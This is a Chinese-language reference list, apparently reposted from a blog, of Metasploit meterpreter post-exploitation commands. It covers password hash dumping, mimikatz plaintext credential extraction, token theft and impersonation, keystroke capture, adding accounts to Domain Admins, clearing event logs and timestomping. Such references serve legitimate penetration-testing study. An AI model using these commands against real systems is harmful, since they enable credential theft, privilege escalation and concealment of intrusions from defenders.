• jQuery火箭图标返回顶部代码


    msf解决中文乱码问题:输入 chcp 65001(UTF-8) chcp 437(IBM437英语)

    sysinfo
    列出受控主机的系统信息
    
    getuid
    查看当前操控身份
    
    ls 
    列出目标主机的文件和文件夹信息
    
    use priv
    加载特权提升扩展模块,来扩展meterpreter库
    
    ps
    显示所有运行进程以及关联的用户账户
    
    getsystem
    通过各种攻击向量来提升到系统用户权限
    
    shell
    以所有可用令牌来运行一个交互的shell
    
    screenshot
    对目标主机的屏幕进行截图
    
    upload file
    向目标主机上传文件
    
    download file
    从目标主机下载文件
    
    keyscan_dump
    存储目标主机上或许的键盘记录
    
    getprivs
    尽可能多的获取目标主机上的特权
    
    background
    将你当前的meterpreter shell转为后台执行
    
    help
    打开帮助
    
    run scriptname
    运行meterpreter脚本,在scripts/meterpreter目录下可查看到所有脚本名
    
    migrate PID
    迁移到一个指定的进程ID
    
    hashdump
    导出目标主机中的口令哈希值
    
    load mimikatz
    加载mimikatz模块
    
    msv
    ssp
    tspkg
    wdigest
    获取登录密码的hash值
    
    kerberos
    获取明文密码
    
    mimikatz_command -f samdump::hashes
    另一种方式获取哈希值
    
    mimikatz_command -f sekurlsa::searchPasswords
    另一种方式获取明文密码
    
    portfwd add -l 3389 -r 192.168.206.200 -p 3389
    把被攻击机的3389端口流量,转发到本地的3389端口上
    
    use incognito 
    加载inconito功能(用来盗取目标主机的令牌或是假冒用户)
    
    list_tokens -u
    列出目标主机用户组的可用令牌
    
    impersonate_token DOMAIN_NAME\USERNAME
    假冒目标主机上的可用令牌。
    
    steal_token
    盗窃给定进程的可用令牌并进行令牌假冒
    
    drop_token
    停止假冒当前的令牌
    
    execute -f cmd.exe -i
    执行cmd.exe命令并进行交互。
    
    execute -f cmd.exe -i -t
    以所有可用令牌来执行cmd命令。
    
    execute -f cmd.exe -i -H -t
    以所有可用令牌来执行cmd命令并隐藏该进程。
    
    add_user username password -h ip
    在远程目标主机上添加一个用户
    
    add_group_user “Domain Adimins”username -h ip
    将用户添加到目标主机的域管理员组中
    
    clearev
    清除目标主机上的日志记录
    
    timestomp
    修改文件属性,例如修改文件的创建时间(反取证调差)
    
    reboot
    重启目标主机
    
    rev2self 
    回到控制目标主机的初始用户账户下。
    
    reg command
    在目标主机注册表中进行交互,创建,删除和查询等操作。
    
    setdesktop number
    切换到另一个用户界面(该功能基于那些用户已登录)。
    
    uietl enable keyboard/mouse
    接管目标主机的键盘和鼠标。
    
    use sniffer
    加载嗅探模块
    
    sniffer_interfaces
    列出目标主机所有开放的网络接口
    
    sniffer_dump interfaceID pcapname
    在目标主机上启动嗅探
    
    sniffer_start interfaceID packet_buffer
    在目标主机上针对特定范围的数据包缓冲区启动嗅探
    
    sniffer_stats interfaceID
    获取正在实施嗅探网络接口的统计数据
    
    sniffer_stop interfaceID
    停止嗅探
    
  • 相关阅读:
    poj-1017 Packets (贪心)
    poj-2393 Yogurt factory (贪心)
    POJ -3190 Stall Reservations (贪心+优先队列)
    hihoCoder 1082然而沼跃鱼早就看穿了一切 (字符串处理)
    kafka:一个分布式消息系统
    Kafka+Storm+HDFS整合实践
    使用Storm实现实时大数据分析
    Kafka使用入门教程 简单介绍
    Zookeeper 的学习与运用
    Kafka 分布式消息队列介绍
  • 原文地址:https://www.cnblogs.com/-mo-/p/11985408.html
Copyright © 2020-2023  润新知